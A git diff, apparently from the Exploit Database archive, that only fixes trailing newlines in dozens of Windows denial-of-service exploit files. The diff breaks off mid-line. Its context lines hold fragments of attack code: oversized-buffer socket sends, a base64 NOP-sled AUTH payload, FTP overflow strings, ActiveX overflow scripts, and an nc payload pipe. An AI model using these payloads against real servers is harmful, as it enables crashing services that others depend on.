http://protekresearchlab.com/exploits/PRL-2012-31.tif -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz) \ No newline at end of file diff --git a/platforms/windows/dos/22685.txt b/platforms/windows/dos/22685.txt index c0f21501a..b67d4c577 100755 --- a/platforms/windows/dos/22685.txt +++ b/platforms/windows/dos/22685.txt @@ -260,6 +260,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or support -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/dos/22690.c b/platforms/windows/dos/22690.c index edf4c975a..adcac2c51 100755 --- a/platforms/windows/dos/22690.c +++ b/platforms/windows/dos/22690.c @@ -56,5 +56,4 @@ int main(int argc, char **argv) close(sd); exit(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/22694.c b/platforms/windows/dos/22694.c index 8c49e0983..226db5799 100755 --- a/platforms/windows/dos/22694.c +++ b/platforms/windows/dos/22694.c @@ -108,4 +108,4 @@ close(sockfd); printf("\n"); return 1; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22706.asm b/platforms/windows/dos/22706.asm index eee8d0673..327262b5a 100755 --- a/platforms/windows/dos/22706.asm +++ b/platforms/windows/dos/22706.asm @@ -644,4 +644,4 @@ start: push 0 callW ExitProcess -end start +end start \ No newline at end of file diff --git a/platforms/windows/dos/22718.c b/platforms/windows/dos/22718.c index ff511f2c7..e9020f585 100755 --- a/platforms/windows/dos/22718.c +++ b/platforms/windows/dos/22718.c @@ -80,4 +80,4 @@ int main(int argc, char *argv[]) printf("Attack done!...\n"); close(sockfd); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22757.c b/platforms/windows/dos/22757.c index 3fa24fe26..46db5307b 100755 --- a/platforms/windows/dos/22757.c +++ b/platforms/windows/dos/22757.c @@ -83,4 +83,4 @@ int main(int argc, char *argv[]) } printf("Attack done!...\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22788.pl b/platforms/windows/dos/22788.pl index 11baad29e..29f1a6aa9 100755 --- a/platforms/windows/dos/22788.pl +++ b/platforms/windows/dos/22788.pl @@ -44,5 +44,4 @@ print ($login1); send(SOCK,$login1, 0) or die "Cannot send query: $!"; print "Now if you are lucky the server will crash:)\n" -#End - +#End \ No newline at end of file diff --git a/platforms/windows/dos/22789.pl b/platforms/windows/dos/22789.pl index 2f7d9d1f0..8421a5014 100755 --- a/platforms/windows/dos/22789.pl +++ b/platforms/windows/dos/22789.pl @@ -84,6 +84,4 @@ for($i=0;$i<=$nb;$i=$i+1) } print $socket "\n"; -print "[+] CPU Overload Sequence sent\n"; - - +print "[+] CPU Overload Sequence sent\n"; \ No newline at end of file diff --git a/platforms/windows/dos/22816.txt b/platforms/windows/dos/22816.txt index 21b7c93ee..10fd4e3e3 100755 --- a/platforms/windows/dos/22816.txt +++ b/platforms/windows/dos/22816.txt @@ -7,5 +7,4 @@ It has been reported that the RuFSI Utility Class is vulnerable to a boundary co <script> test.CompareVersionStrings("long string here","or long string here") -</script> - +</script> \ No newline at end of file diff --git a/platforms/windows/dos/22817.pl b/platforms/windows/dos/22817.pl index 694f49cc9..349becd74 100755 --- a/platforms/windows/dos/22817.pl +++ b/platforms/windows/dos/22817.pl @@ -29,5 +29,4 @@ $sox = IO::Socket::INET->new( print $sox $request; sleep 2; close $sox; -print "Done...\n"; - +print "Done...\n"; \ No newline at end of file diff --git a/platforms/windows/dos/22825.c b/platforms/windows/dos/22825.c index 5f5826edf..4f5be0188 100755 --- a/platforms/windows/dos/22825.c +++ b/platforms/windows/dos/22825.c @@ -75,4 +75,4 @@ int main(int argc, char *argv[]) write(sockfd, send, strlen(send)); printf("Attack done!...\n"); close(sockfd); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22850.txt b/platforms/windows/dos/22850.txt index ef2aa95e0..ba626c3ed 100755 --- a/platforms/windows/dos/22850.txt +++ b/platforms/windows/dos/22850.txt @@ -79,4 +79,4 @@ Short Description: WriteAV ############################################################################### Proof of concept included. http://www43.zippyshare.com/v/27372192/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22850.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22850.rar \ No newline at end of file diff --git a/platforms/windows/dos/22878.txt b/platforms/windows/dos/22878.txt index ee4fef8cb..6ea63ae00 100755 --- a/platforms/windows/dos/22878.txt +++ b/platforms/windows/dos/22878.txt @@ -168,4 +168,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp JP2KLib http://www7.zippyshare.com/v/22655486/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22878-2.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22878-2.rar \ No newline at end of file diff --git a/platforms/windows/dos/22999.pl b/platforms/windows/dos/22999.pl index 5650fdab4..e3dc50893 100755 --- a/platforms/windows/dos/22999.pl +++ b/platforms/windows/dos/22999.pl @@ -34,4 +34,4 @@ if("$ARGV[0]" eq "") { $ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'); $ftp->quit; print("Success!\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/23003.py b/platforms/windows/dos/23003.py index d846a33c7..143876c61 100755 --- a/platforms/windows/dos/23003.py +++ b/platforms/windows/dos/23003.py @@ -56,5 +56,4 @@ file+="recents=" + junk out_file = open("umplayer.ini",'w') out_file.write(file) -out_file.close() - +out_file.close() \ No newline at end of file diff --git a/platforms/windows/dos/2302.pl b/platforms/windows/dos/2302.pl index c95986719..074119f4f 100755 --- a/platforms/windows/dos/2302.pl +++ b/platforms/windows/dos/2302.pl @@ -68,4 +68,4 @@ print $socket $payload; close($socket); -# milw0rm.com [2006-09-05] +# milw0rm.com [2006-09-05] \ No newline at end of file diff --git a/platforms/windows/dos/23042.pl b/platforms/windows/dos/23042.pl index 3777e32b5..23f481f45 100755 --- a/platforms/windows/dos/23042.pl +++ b/platforms/windows/dos/23042.pl @@ -21,5 +21,4 @@ It has been reported that some versions of Cerberus FTP Server may be prone to r sleep(1); print "Server Crashed!"; sleep(1); - exit; - + exit; \ No newline at end of file diff --git a/platforms/windows/dos/23053.pl b/platforms/windows/dos/23053.pl index bcc104aaf..505c1a8cf 100755 --- a/platforms/windows/dos/23053.pl +++ b/platforms/windows/dos/23053.pl @@ -26,5 +26,4 @@ $sox = IO::Socket::INET->new( sleep 2; print $sox $dos; sleep 1; -print "done..vpop3d should lock now :)\n"; - +print "done..vpop3d should lock now :)\n"; \ No newline at end of file diff --git a/platforms/windows/dos/23056.c b/platforms/windows/dos/23056.c index 773dfe3f6..225177299 100755 --- a/platforms/windows/dos/23056.c +++ b/platforms/windows/dos/23056.c @@ -115,5 +115,4 @@ printf ("+ Ending...\n"); ending(argv[1]); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23088.pl b/platforms/windows/dos/23088.pl index c69f73950..ce4f6f554 100755 --- a/platforms/windows/dos/23088.pl +++ b/platforms/windows/dos/23088.pl @@ -148,6 +148,4 @@ $rand x $rand; $port=int(rand 65000) +1; send(DoS, 0, $size, sockaddr_in($port, $iaddr)); } -sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");} - - +sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");} \ No newline at end of file diff --git a/platforms/windows/dos/23089.c b/platforms/windows/dos/23089.c index 98ff4b478..80ae11f2f 100755 --- a/platforms/windows/dos/23089.c +++ b/platforms/windows/dos/23089.c @@ -226,5 +226,4 @@ int sock, optval=1; close(sock); exit(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23090.asm b/platforms/windows/dos/23090.asm index b63eea9bc..eb23029d3 100755 --- a/platforms/windows/dos/23090.asm +++ b/platforms/windows/dos/23090.asm @@ -335,4 +335,4 @@ NAME=zados $(NAME).exe: $(NAME).obj Link /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj $(NAME).obj: $(NAME).asm - ml /c /coff /Cp $(NAME).asm + ml /c /coff /Cp $(NAME).asm \ No newline at end of file diff --git a/platforms/windows/dos/23101.c b/platforms/windows/dos/23101.c index d377aaded..b600472b4 100755 --- a/platforms/windows/dos/23101.c +++ b/platforms/windows/dos/23101.c @@ -226,5 +226,4 @@ int sock, optval=1; close(sock); exit(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23102.pl b/platforms/windows/dos/23102.pl index 8b4327a5a..ea983cfe6 100755 --- a/platforms/windows/dos/23102.pl +++ b/platforms/windows/dos/23102.pl @@ -165,6 +165,4 @@ $conn-> autoflush(1); print "[x] Sending exploit code ...\n"; print $conn $request; print "[x] Exploit sent .. good luck :) ...\n"; -#print $request; - - +#print $request; \ No newline at end of file diff --git a/platforms/windows/dos/23107.txt b/platforms/windows/dos/23107.txt index 16bd2c343..02090a092 100755 --- a/platforms/windows/dos/23107.txt +++ b/platforms/windows/dos/23107.txt @@ -75,4 +75,4 @@ User mode write access violations that are not near NULL are exploitable. ################################################################################ Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23107.zip \ No newline at end of file diff --git a/platforms/windows/dos/23145.c b/platforms/windows/dos/23145.c index 99ecd68f6..c4ef51de0 100755 --- a/platforms/windows/dos/23145.c +++ b/platforms/windows/dos/23145.c @@ -70,5 +70,4 @@ void main(int argc, char *argv[]) write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23146.c b/platforms/windows/dos/23146.c index 5e3a0bb20..e5247c059 100755 --- a/platforms/windows/dos/23146.c +++ b/platforms/windows/dos/23146.c @@ -70,5 +70,4 @@ void main(int argc, char *argv[]) write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23150.c b/platforms/windows/dos/23150.c index b597cac23..84c383204 100755 --- a/platforms/windows/dos/23150.c +++ b/platforms/windows/dos/23150.c @@ -81,5 +81,4 @@ www.m00security.org\n\n"); close(sock); return(0); } -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23166.pl b/platforms/windows/dos/23166.pl index 7b73c3669..f90952222 100755 --- a/platforms/windows/dos/23166.pl +++ b/platforms/windows/dos/23166.pl @@ -36,5 +36,4 @@ $host\n"; $ftp->quit(); print("Success!\n"); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23169.pl b/platforms/windows/dos/23169.pl index ca2156572..832d40167 100755 --- a/platforms/windows/dos/23169.pl +++ b/platforms/windows/dos/23169.pl @@ -45,5 +45,4 @@ $socket->autoflush(1); sleep 2; print "we are done here..\n\n"; -close($socket); - +close($socket); \ No newline at end of file diff --git a/platforms/windows/dos/23177.txt b/platforms/windows/dos/23177.txt index f455284da..0c18c634f 100755 --- a/platforms/windows/dos/23177.txt +++ b/platforms/windows/dos/23177.txt @@ -64,4 +64,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5116.php pDirectory=String(2068, "A") attack.AddPackages pDirectory </script> -</body></html> +</body></html> \ No newline at end of file diff --git a/platforms/windows/dos/23201.txt b/platforms/windows/dos/23201.txt index c7d41a768..c7f88a857 100755 --- a/platforms/windows/dos/23201.txt +++ b/platforms/windows/dos/23201.txt @@ -66,5 +66,4 @@ User mode DEP access violations are exploitable. Proof of concept included. http://www39.zippyshare.com/v/91522221/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar - +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23201.rar \ No newline at end of file diff --git a/platforms/windows/dos/23234.c b/platforms/windows/dos/23234.c index b15efec91..0d0c599fe 100755 --- a/platforms/windows/dos/23234.c +++ b/platforms/windows/dos/23234.c @@ -91,4 +91,4 @@ puts ("ok!"); } closesocket (sock1); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/23240.pl b/platforms/windows/dos/23240.pl index ddabe23da..c45e65d49 100755 --- a/platforms/windows/dos/23240.pl +++ b/platforms/windows/dos/23240.pl @@ -38,5 +38,4 @@ until($line =~/PING/){ $line =~ s/.*://; print $ocket "PONG :$line\n"; print $ocket "nick thssmnck\n"; -print $ocket "privmsg $nick :DCC SEND \"a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a \" 1079095848 666\n"; - +print $ocket "privmsg $nick :DCC SEND \"a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a \" 1079095848 666\n"; \ No newline at end of file diff --git a/platforms/windows/dos/23241.pl b/platforms/windows/dos/23241.pl index dab0382c2..fd8dad20c 100755 --- a/platforms/windows/dos/23241.pl +++ b/platforms/windows/dos/23241.pl @@ -102,5 +102,4 @@ Irssi::settings_add_str('mirc_dcc_crash', 'mirc_dcc_crash_sender_ip', '80.34.2.2 Irssi::settings_add_str('mirc_dcc_crash', 'mirc_dcc_crash_filename_suffix', ''); Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_filename_length', 400); -Irssi::command_bind('crashmirc', 'crash_mirc'); - +Irssi::command_bind('crashmirc', 'crash_mirc'); \ No newline at end of file diff --git a/platforms/windows/dos/23242.pl b/platforms/windows/dos/23242.pl index 406f25775..494e3b427 100755 --- a/platforms/windows/dos/23242.pl +++ b/platforms/windows/dos/23242.pl @@ -27,4 +27,4 @@ send($socket, $buf, 0, $portaddr); print "sent\n"; } -print "Done\n"; +print "Done\n"; \ No newline at end of file diff --git a/platforms/windows/dos/23267.txt b/platforms/windows/dos/23267.txt index f3475ab39..dff16a5b9 100755 --- a/platforms/windows/dos/23267.txt +++ b/platforms/windows/dos/23267.txt @@ -5,6 +5,4 @@ A problem has been reported in MERCUR Mailserver when handling the IMAP AUTH com On the IMAP port: AUTH PLAIN -kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ - - +kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ \ No newline at end of file diff --git a/platforms/windows/dos/233.pl b/platforms/windows/dos/233.pl index df8655d9a..2acc05e1b 100755 --- a/platforms/windows/dos/233.pl +++ b/platforms/windows/dos/233.pl @@ -51,4 +51,4 @@ while(1){ } -# milw0rm.com [2000-12-19] +# milw0rm.com [2000-12-19] \ No newline at end of file diff --git a/platforms/windows/dos/23310.pl b/platforms/windows/dos/23310.pl index ba7ed1f4a..78663f187 100755 --- a/platforms/windows/dos/23310.pl +++ b/platforms/windows/dos/23310.pl @@ -48,4 +48,4 @@ PeerAddr=>$server,PeerPort=>$port, Timeout=>5); close($Sock); if (@Respost == 0){die " D.o.S Completed!\n";} else { print " D.o.S Not Completed"; } - }else{ print"Impossible to connect from $server"; } + }else{ print"Impossible to connect from $server"; } \ No newline at end of file diff --git a/platforms/windows/dos/23337.c b/platforms/windows/dos/23337.c index 3325573d4..ea030b155 100755 --- a/platforms/windows/dos/23337.c +++ b/platforms/windows/dos/23337.c @@ -35,4 +35,4 @@ for (;;) send(s,0,0,0); sleep(1); printf("."); fflush(stdout); } close(s); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/2334.py b/platforms/windows/dos/2334.py index c642a46a1..779f18855 100755 --- a/platforms/windows/dos/2334.py +++ b/platforms/windows/dos/2334.py @@ -81,4 +81,4 @@ MAXLEN = 1024 s.close() print '%s(%d) said "%s"' % (addr[0],addr[1], data) -# milw0rm.com [2006-09-08] +# milw0rm.com [2006-09-08] \ No newline at end of file diff --git a/platforms/windows/dos/23412.pl b/platforms/windows/dos/23412.pl index 14464bd96..6dd3aa2b6 100755 --- a/platforms/windows/dos/23412.pl +++ b/platforms/windows/dos/23412.pl @@ -41,6 +41,4 @@ sleep(1); close($victim); } print "Done.\n"; -exit; - - +exit; \ No newline at end of file diff --git a/platforms/windows/dos/23468.pl b/platforms/windows/dos/23468.pl index 8c211a75e..def808a43 100755 --- a/platforms/windows/dos/23468.pl +++ b/platforms/windows/dos/23468.pl @@ -26,4 +26,4 @@ $buf = "A"x54; # Min 54, Max 523 print $remote "PASS ".$buf."\r\n"; sleep(1); -close $remote; +close $remote; \ No newline at end of file diff --git a/platforms/windows/dos/23469.txt b/platforms/windows/dos/23469.txt index 46b23755c..ec8189a9b 100755 --- a/platforms/windows/dos/23469.txt +++ b/platforms/windows/dos/23469.txt @@ -54,4 +54,4 @@ Instruction Address: 0x0000000001953095 Proof of concept included. http://www48.zippyshare.com/v/64875465/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23469.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23469.rar \ No newline at end of file diff --git a/platforms/windows/dos/23501.c b/platforms/windows/dos/23501.c index 2b7fb7ad0..c8ecd09a0 100755 --- a/platforms/windows/dos/23501.c +++ b/platforms/windows/dos/23501.c @@ -60,5 +60,4 @@ void main(int argc, char **argv) } WSACleanup(); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23530.c b/platforms/windows/dos/23530.c index f399ac45f..1c5b13fea 100755 --- a/platforms/windows/dos/23530.c +++ b/platforms/windows/dos/23530.c @@ -135,8 +135,4 @@ u_long resolv(char *host) { else host_ip = *(u_long *)(hp->h_addr); } return(host_ip); -} - - - - +} \ No newline at end of file diff --git a/platforms/windows/dos/23565.txt b/platforms/windows/dos/23565.txt index 5703c5703..10753bd8c 100755 --- a/platforms/windows/dos/23565.txt +++ b/platforms/windows/dos/23565.txt @@ -124,4 +124,4 @@ overrun.DownloadURLToFile bstrUrl, bstrFile </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/23567.txt b/platforms/windows/dos/23567.txt index 40f9445e5..81c7575ee 100755 --- a/platforms/windows/dos/23567.txt +++ b/platforms/windows/dos/23567.txt @@ -82,4 +82,4 @@ overrun.Load File </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/23568.txt b/platforms/windows/dos/23568.txt index 23661a5da..4d0e5dd95 100755 --- a/platforms/windows/dos/23568.txt +++ b/platforms/windows/dos/23568.txt @@ -77,4 +77,4 @@ overrun.CheckCompatibility OrgHeartBeat, OrgScriptFile, DataTypes </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/23569.txt b/platforms/windows/dos/23569.txt index 51daad859..552f2ef58 100755 --- a/platforms/windows/dos/23569.txt +++ b/platforms/windows/dos/23569.txt @@ -83,4 +83,4 @@ overrun.Admin_RemoveDirectory Path </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/23584.c b/platforms/windows/dos/23584.c index bf9328029..acf8d3241 100755 --- a/platforms/windows/dos/23584.c +++ b/platforms/windows/dos/23584.c @@ -147,6 +147,4 @@ communicate on port 8081 return 1; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/23595.txt b/platforms/windows/dos/23595.txt index 08eb0ec77..fe5c945a1 100755 --- a/platforms/windows/dos/23595.txt +++ b/platforms/windows/dos/23595.txt @@ -12,4 +12,4 @@ GET /index.htm index.htm -GET /aaaaaa[ 260 of a ]aaa HTTP/1.1 +GET /aaaaaa[ 260 of a ]aaa HTTP/1.1 \ No newline at end of file diff --git a/platforms/windows/dos/23660.c b/platforms/windows/dos/23660.c index 8d2649372..7d52f6878 100755 --- a/platforms/windows/dos/23660.c +++ b/platforms/windows/dos/23660.c @@ -93,4 +93,4 @@ string...\n"); printf("[+] Done!\n"); return(0); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/23681.pl b/platforms/windows/dos/23681.pl index 4df0d0b80..517997558 100755 --- a/platforms/windows/dos/23681.pl +++ b/platforms/windows/dos/23681.pl @@ -35,4 +35,4 @@ sleep(1); print $remote"cd ".$buf."\r\n"; # If it fails then overrun the cd buffer instead - sleep(1); # but 2997 characters should do it :p -close $remote; +close $remote; \ No newline at end of file diff --git a/platforms/windows/dos/23708.c b/platforms/windows/dos/23708.c index 8c38bd40e..9f7a689ea 100755 --- a/platforms/windows/dos/23708.c +++ b/platforms/windows/dos/23708.c @@ -46,4 +46,4 @@ int main(int argc, char *argv[]) system(cmd); } -/*******************************/ +/*******************************/ \ No newline at end of file diff --git a/platforms/windows/dos/23715.pl b/platforms/windows/dos/23715.pl index 9228a1a05..85806d7fa 100755 --- a/platforms/windows/dos/23715.pl +++ b/platforms/windows/dos/23715.pl @@ -32,4 +32,4 @@ problems"); ?sleep 100; ? ? ? ? ?close(S); ?} else { die("Can't connect...\n"); } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/23731.txt b/platforms/windows/dos/23731.txt index 0ab329a84..410cf3206 100755 --- a/platforms/windows/dos/23731.txt +++ b/platforms/windows/dos/23731.txt @@ -14,6 +14,4 @@ appe //../qwerty rnfr //../qwerty rnto //../qwerty rmd //../qwerty -xrmd //../qwerty - - +xrmd //../qwerty \ No newline at end of file diff --git a/platforms/windows/dos/23752.c b/platforms/windows/dos/23752.c index 1a2f4ca94..0af14669d 100755 --- a/platforms/windows/dos/23752.c +++ b/platforms/windows/dos/23752.c @@ -160,6 +160,4 @@ u_long resolv(char *host) { perror("\nError"); exit(1); } -#endif - - +#endif \ No newline at end of file diff --git a/platforms/windows/dos/23760.pl b/platforms/windows/dos/23760.pl index d8896723b..6f9de1e56 100755 --- a/platforms/windows/dos/23760.pl +++ b/platforms/windows/dos/23760.pl @@ -55,4 +55,4 @@ sleep (4); print "Sending MDTM Overflow.....\n"; print $socket2 "MDTM 20041111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt" ,CRLF; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/23761.c b/platforms/windows/dos/23761.c index 08c570c63..04131683c 100755 --- a/platforms/windows/dos/23761.c +++ b/platforms/windows/dos/23761.c @@ -99,5 +99,4 @@ int main(int argc, char *argv[]) { printf("[+] Done! Check if the Serv-U server has crashed.\n"); return(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23762.c b/platforms/windows/dos/23762.c index a3fe00ce4..4e78f422f 100755 --- a/platforms/windows/dos/23762.c +++ b/platforms/windows/dos/23762.c @@ -122,5 +122,4 @@ command. */ has crashed.\n"); return(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/23769.pl b/platforms/windows/dos/23769.pl index ea95806ce..ddb1eefe8 100755 --- a/platforms/windows/dos/23769.pl +++ b/platforms/windows/dos/23769.pl @@ -80,4 +80,4 @@ while (<$remote>) } } -close $remote; +close $remote; \ No newline at end of file diff --git a/platforms/windows/dos/23780.py b/platforms/windows/dos/23780.py index 43f475f97..2bffa1590 100755 --- a/platforms/windows/dos/23780.py +++ b/platforms/windows/dos/23780.py @@ -11,4 +11,4 @@ file.close() #salam BLANK SEPARATOS #thanks to everyone :D -#magelangan cyber ,pohon jati crew, jagad kali kode , bisul heker, +#magelangan cyber ,pohon jati crew, jagad kali kode , bisul heker, \ No newline at end of file diff --git a/platforms/windows/dos/23916.txt b/platforms/windows/dos/23916.txt index 5f1b850df..8d6167183 100755 --- a/platforms/windows/dos/23916.txt +++ b/platforms/windows/dos/23916.txt @@ -95,5 +95,4 @@ rafi.url = a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a -</script> - +</script> \ No newline at end of file diff --git a/platforms/windows/dos/23919.txt b/platforms/windows/dos/23919.txt index 893b6f915..e54715b63 100755 --- a/platforms/windows/dos/23919.txt +++ b/platforms/windows/dos/23919.txt @@ -41,4 +41,4 @@ mymy2.GetPrivateProfileString "file",a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/2400.html b/platforms/windows/dos/2400.html index 643d52f18..895bf36b5 100755 --- a/platforms/windows/dos/2400.html +++ b/platforms/windows/dos/2400.html @@ -28,4 +28,4 @@ type="gradientRadial" /> </body> </html> -# milw0rm.com [2006-09-19] +# milw0rm.com [2006-09-19] \ No newline at end of file diff --git a/platforms/windows/dos/24000.pl b/platforms/windows/dos/24000.pl index aa24fe428..3c0d591a6 100755 --- a/platforms/windows/dos/24000.pl +++ b/platforms/windows/dos/24000.pl @@ -46,4 +46,4 @@ sub nest { print "Content-Type: text/plain\n\n"; print "Final $x\n"; print "--$b--\n\n"; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/24110.py b/platforms/windows/dos/24110.py index 59d51cdcf..c009e7fa0 100755 --- a/platforms/windows/dos/24110.py +++ b/platforms/windows/dos/24110.py @@ -35,4 +35,4 @@ print "[*] Sending malformed request..." s.sendto(payload,(target,port)) print "[!] Exploit has been sent!\n" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/24111.py b/platforms/windows/dos/24111.py index 4289620dd..05102535e 100755 --- a/platforms/windows/dos/24111.py +++ b/platforms/windows/dos/24111.py @@ -44,4 +44,4 @@ print "[*] Sending malformed request..." s.send(payload) print "[!] Exploit has been sent!\n" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/24142.pl b/platforms/windows/dos/24142.pl index 543426452..bfd408621 100755 --- a/platforms/windows/dos/24142.pl +++ b/platforms/windows/dos/24142.pl @@ -79,5 +79,4 @@ sub recv_reply if (/$repcode/) { last; } } return $res; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/24145.c b/platforms/windows/dos/24145.c index bee7ec521..fa2f56667 100755 --- a/platforms/windows/dos/24145.c +++ b/platforms/windows/dos/24145.c @@ -101,5 +101,4 @@ int main(int argc, char *argv[]) closesocket(mysocket); WSACleanup(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/24146.bat b/platforms/windows/dos/24146.bat index 9fb1ce2a7..ea2772db2 100755 --- a/platforms/windows/dos/24146.bat +++ b/platforms/windows/dos/24146.bat @@ -27,5 +27,4 @@ rcx 2A nhttp.tmp w -q - +q \ No newline at end of file diff --git a/platforms/windows/dos/24147.bat b/platforms/windows/dos/24147.bat index e03a337a6..145b7ce03 100755 --- a/platforms/windows/dos/24147.bat +++ b/platforms/windows/dos/24147.bat @@ -31,5 +31,4 @@ q :run nc %1 %PORT% < dos.a -del dos.a - +del dos.a \ No newline at end of file diff --git a/platforms/windows/dos/24150.pl b/platforms/windows/dos/24150.pl index 33f870f7d..1b7260508 100755 --- a/platforms/windows/dos/24150.pl +++ b/platforms/windows/dos/24150.pl @@ -30,5 +30,4 @@ print $socket "CD $buffer\r\n"; $socket->recv($test,100); print $test; -close($socket); - +close($socket); \ No newline at end of file diff --git a/platforms/windows/dos/24208.c b/platforms/windows/dos/24208.c index 